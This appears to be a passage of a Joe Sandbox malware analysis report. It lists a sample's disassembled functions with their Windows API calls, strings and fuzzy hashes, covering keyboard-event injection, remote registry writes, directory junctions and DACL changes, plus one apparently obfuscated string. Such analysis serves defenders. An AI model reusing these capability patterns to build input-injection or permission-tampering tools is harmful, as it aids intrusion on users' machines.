                                                  • SendMessageW.USER32 ref: 00C4D154
                                                  • ClientToScreen.USER32(?,?), ref: 00C4D1B2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C4D1E2
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C4D20C
                                                  • SendMessageW.USER32 ref: 00C4D22F
                                                  • ClientToScreen.USER32(?,?), ref: 00C4D281
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C4D2B5
                                                    • Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C4D351
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 3977979337-4164748364
                                                  • Opcode ID: 7af783c1eaab74ae9477ff952d9842ad90c95ffd0b46921bb231c0f8fbe95f1c
                                                  • Instruction ID: 8cebeb37770052de3a0c4ab4cac7770725d49255f9c3cedbd1151f92ec115348
                                                  • Opcode Fuzzy Hash: 7af783c1eaab74ae9477ff952d9842ad90c95ffd0b46921bb231c0f8fbe95f1c
                                                  • Instruction Fuzzy Hash: 1C42A978605241AFDB20DF24C888FAABBE5FF49310F14092DF6A6872B1C771D951DB92
                                                  Function 00C47DDB Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00C484D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: %d/%02d/%02d
                                                  • API String ID: 3850602802-328681919
                                                  • Opcode ID: b9800ae3c769bd2dd23761d968cabced10346db79e864352734bd3adc5e32acd
                                                  • Instruction ID: 801cb380bd6fc8d6310fa7535c3893ab648d7c50c9bde1156c8e6d5444e5cc64
                                                  • Opcode Fuzzy Hash: b9800ae3c769bd2dd23761d968cabced10346db79e864352734bd3adc5e32acd
                                                  • Instruction Fuzzy Hash: 4412C071600249ABEB259F65CC49FAF7BF8FF46310F104269F915EA2E1DBB09A45CB10
                                                  Function 00BD6F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove$_memset
                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                  • API String ID: 1357608183-1798697756
                                                  • Opcode ID: ef4e9fd7789e442f269a796adb20515a9cdace413ddd5f3740c41fece00e1495
                                                  • Instruction ID: 28e0daeb9246970333c97781a83617b1b87ed29987d94b968592cddedf2d36ff
                                                  • Opcode Fuzzy Hash: ef4e9fd7789e442f269a796adb20515a9cdace413ddd5f3740c41fece00e1495
                                                  • Instruction Fuzzy Hash: 21938F75A44219DBDB24CF98C881BEDB7F1FF49314F2481AAE955AB380E7709E81DB40
                                                  Function 00BC48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32(00000000,?), ref: 00BC48DF
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BFD665
                                                  • IsIconic.USER32(?), ref: 00BFD66E
                                                  • ShowWindow.USER32(?,00000009), ref: 00BFD67B
                                                  • SetForegroundWindow.USER32(?), ref: 00BFD685
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFD69B
                                                  • GetCurrentThreadId.KERNEL32 ref: 00BFD6A2
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BFD6AE
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFD6BF
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFD6C7
                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00BFD6CF
                                                  • SetForegroundWindow.USER32(?), ref: 00BFD6D2
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFD6E7
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BFD6F2
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFD6FC
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BFD701
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFD70A
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BFD70F
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFD719
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BFD71E
                                                  • SetForegroundWindow.USER32(?), ref: 00BFD721
                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 00BFD748
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  • Opcode ID: 984e16cec0d360374962a602faa8a6c8f59656d706ef532b554ecb8161649b29
                                                  • Instruction ID: e19577fbbbee949918b0c5d39f46f389160620124c7525f23d4716f5715f93b9
                                                  • Opcode Fuzzy Hash: 984e16cec0d360374962a602faa8a6c8f59656d706ef532b554ecb8161649b29
                                                  • Instruction Fuzzy Hash: 64317375A4031CBAEB206B619C89F7F7EADEB45B50F114069FB04EB1D1C6B05D11ABA0
                                                  Function 00C2C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C2C78D
                                                  • FindClose.KERNEL32(00000000), ref: 00C2C7E1
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C2C806
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C2C81D
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C2C844
                                                  • __swprintf.LIBCMT ref: 00C2C890
                                                  • __swprintf.LIBCMT ref: 00C2C8D3
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • __swprintf.LIBCMT ref: 00C2C927
                                                    • Part of subcall function 00BE3698: __woutput_l.LIBCMT ref: 00BE36F1
                                                  • __swprintf.LIBCMT ref: 00C2C975
                                                    • Part of subcall function 00BE3698: __flsbuf.LIBCMT ref: 00BE3713
                                                    • Part of subcall function 00BE3698: __flsbuf.LIBCMT ref: 00BE372B
                                                  • __swprintf.LIBCMT ref: 00C2C9C4
                                                  • __swprintf.LIBCMT ref: 00C2CA13
                                                  • __swprintf.LIBCMT ref: 00C2CA62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 3953360268-2428617273
                                                  • Opcode ID: 965997f636f468fd75f4d707914f3fefa16c67766789c8dc3a8ef8b72fe22aac
                                                  • Instruction ID: d1f41403ad4d5e91fc3dc0f2e565e4ef53eddc7c5a5e75447ff933d98aa4f9d9
                                                  • Opcode Fuzzy Hash: 965997f636f468fd75f4d707914f3fefa16c67766789c8dc3a8ef8b72fe22aac
                                                  • Instruction Fuzzy Hash: C2A12FB1408345ABD710EFA4D889EAFB7ECBF95700F40496DF59587191EB30DA48CB62
                                                  Function 00C2EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00C2EFB6
                                                  • _wcscmp.LIBCMT ref: 00C2EFCB
                                                  • _wcscmp.LIBCMT ref: 00C2EFE2
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00C2EFF4
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00C2F00E
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C2F026
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F031
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00C2F04D
                                                  • _wcscmp.LIBCMT ref: 00C2F074
                                                  • _wcscmp.LIBCMT ref: 00C2F08B
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2F09D
                                                  • SetCurrentDirectoryW.KERNEL32(00C78920), ref: 00C2F0BB
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2F0C5
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F0D2
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F0E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1803514871-438819550
                                                  • Opcode ID: ba18c66d17f09c8fac083dbfcf327996facb0fc11b25061683b3a005a7d53229
                                                  • Instruction ID: e825e02c737e2bcbe413c6b91b9ca50e1d42b80756d80df9a2722c132690d191
                                                  • Opcode Fuzzy Hash: ba18c66d17f09c8fac083dbfcf327996facb0fc11b25061683b3a005a7d53229
                                                  • Instruction Fuzzy Hash: B931D03650022C6BDB249FA4EC49BEE77FCAF49360F1041B9E915E30A1DB70DB46CA61
                                                  Function 00C40857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C40953
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C4F910,00000000,?,00000000,?,?), ref: 00C409C1
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C40A09
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C40A92
                                                  • RegCloseKey.ADVAPI32(?), ref: 00C40DB2
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C40DBF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: cbb66053fdb19e68b7f37378e3c88a89bcea56022622f1099d4f481f9bf1526a
                                                  • Instruction ID: efe0e2600e74e9f658a64f3385bce9c3d7d57fbb01de0ed6437cb8310bca8150
                                                  • Opcode Fuzzy Hash: cbb66053fdb19e68b7f37378e3c88a89bcea56022622f1099d4f481f9bf1526a
                                                  • Instruction Fuzzy Hash: E5028E756006119FDB14EF24C885E2AB7E5FF89710F1485ACF99A9B3A2CB30ED45CB81
                                                  Function 00C2F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00C2F113
                                                  • _wcscmp.LIBCMT ref: 00C2F128
                                                  • _wcscmp.LIBCMT ref: 00C2F13F
                                                    • Part of subcall function 00C24385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C243A0
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C2F16E
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F179
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00C2F195
                                                  • _wcscmp.LIBCMT ref: 00C2F1BC
                                                  • _wcscmp.LIBCMT ref: 00C2F1D3
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2F1E5
                                                  • SetCurrentDirectoryW.KERNEL32(00C78920), ref: 00C2F203
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2F20D
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F21A
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F22C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 1824444939-438819550
                                                  • Opcode ID: 3a1f3fccbe8afb18b2e273768e0f2ec964f9a976999eba601807e420be40cdf1
                                                  • Instruction ID: 60f864fde8b2a43888c7f6c94f35d7316d945d8191809b26380db4186ee76021
                                                  • Opcode Fuzzy Hash: 3a1f3fccbe8afb18b2e273768e0f2ec964f9a976999eba601807e420be40cdf1
                                                  • Instruction Fuzzy Hash: 6331B33650022DAADB249FA4FC49BEE77BCAF46360F1041B9E914A35A0DB70DF46CE54
                                                  Function 00C2A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C2A20F
                                                  • __swprintf.LIBCMT ref: 00C2A231
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C2A26E
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C2A293
                                                  • _memset.LIBCMT ref: 00C2A2B2
                                                  • _wcsncpy.LIBCMT ref: 00C2A2EE
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C2A323
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C2A32E
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00C2A337
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C2A341
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: 7526d40cba3b771bb0a82b9766b9d05f005b20246ad2834dade7864b7facc7f5
                                                  • Instruction ID: 9f8e81c5f271eb8ab5c272bcdeeed1640ef6aa72cb3492d5114be910b6fafcce
                                                  • Opcode Fuzzy Hash: 7526d40cba3b771bb0a82b9766b9d05f005b20246ad2834dade7864b7facc7f5
                                                  • Instruction Fuzzy Hash: AC31AEB5900119ABDB21DFA0DC49FEF37BCAF89710F1040BAF608D2160EB7097458B65
                                                  Function 00C17CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C18202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C1821E
                                                    • Part of subcall function 00C18202: GetLastError.KERNEL32(?,00C17CE2,?,?,?), ref: 00C18228
                                                    • Part of subcall function 00C18202: GetProcessHeap.KERNEL32(00000008,?,?,00C17CE2,?,?,?), ref: 00C18237
                                                    • Part of subcall function 00C18202: HeapAlloc.KERNEL32(00000000,?,00C17CE2,?,?,?), ref: 00C1823E
                                                    • Part of subcall function 00C18202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C18255
                                                    • Part of subcall function 00C1829F: GetProcessHeap.KERNEL32(00000008,00C17CF8,00000000,00000000,?,00C17CF8,?), ref: 00C182AB
                                                    • Part of subcall function 00C1829F: HeapAlloc.KERNEL32(00000000,?,00C17CF8,?), ref: 00C182B2
                                                    • Part of subcall function 00C1829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C17CF8,?), ref: 00C182C3
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C17D13
                                                  • _memset.LIBCMT ref: 00C17D28
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C17D47
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C17D58
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00C17D95
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C17DB1
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C17DCE
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C17DDD
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C17DE4
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C17E05
                                                  • CopySid.ADVAPI32(00000000), ref: 00C17E0C
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C17E3D
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C17E63
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C17E77
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 9ffb62fdc0f834cb722dab0647b183e7bf5503e56a4805ac91792b74f404149d
                                                  • Instruction ID: b30b24c34fdb72694bb7abd4d3873323912b166851aa09bec287f564ace96d64
                                                  • Opcode Fuzzy Hash: 9ffb62fdc0f834cb722dab0647b183e7bf5503e56a4805ac91792b74f404149d
                                                  • Instruction Fuzzy Hash: E1616D75904109AFDF00DFA0DC44AEEBBB9FF46300F148269F825A6291DB319A56DB60
                                                  Function 00BD66E1 Relevance: 19.6, Strings: 15, Instructions: 889COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak
                                                  • API String ID: 0-142637280
                                                  • Opcode ID: 13a50ed39ea42c00878c43c8f726580a41a29abbe96cc50c4e0230127610b715
                                                  • Instruction ID: cdd97a171d0696068bc6424b362bf905ae0c7c54ec29c6bc9c45c846aeff60cc
                                                  • Opcode Fuzzy Hash: 13a50ed39ea42c00878c43c8f726580a41a29abbe96cc50c4e0230127610b715
                                                  • Instruction Fuzzy Hash: 0F726E75E002199ADB24CF59C8807EEB7F5FF49710F1481AAE919EB390E7349A81DB90
                                                  Function 00C2001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00C20097
                                                  • SetKeyboardState.USER32(?), ref: 00C20102
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00C20122
                                                  • GetKeyState.USER32(000000A0), ref: 00C20139
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00C20168
                                                  • GetKeyState.USER32(000000A1), ref: 00C20179
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00C201A5
                                                  • GetKeyState.USER32(00000011), ref: 00C201B3
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00C201DC
                                                  • GetKeyState.USER32(00000012), ref: 00C201EA
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00C20213
                                                  • GetKeyState.USER32(0000005B), ref: 00C20221
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: d152a5df904b8293c5b7c12f18c15c9eda4ee01d71b89a0aa6d10818043d65ce
                                                  • Instruction ID: 7fcef187f222540e1b3196b427aa095fc54d39d9f2b7ff56de0938dda3a1a899
                                                  • Opcode Fuzzy Hash: d152a5df904b8293c5b7c12f18c15c9eda4ee01d71b89a0aa6d10818043d65ce
                                                  • Instruction Fuzzy Hash: 1D5109309047A829FB35DBA0A8547EEBFB49F01380F18459FC9D2569C3DAA49B8CC761
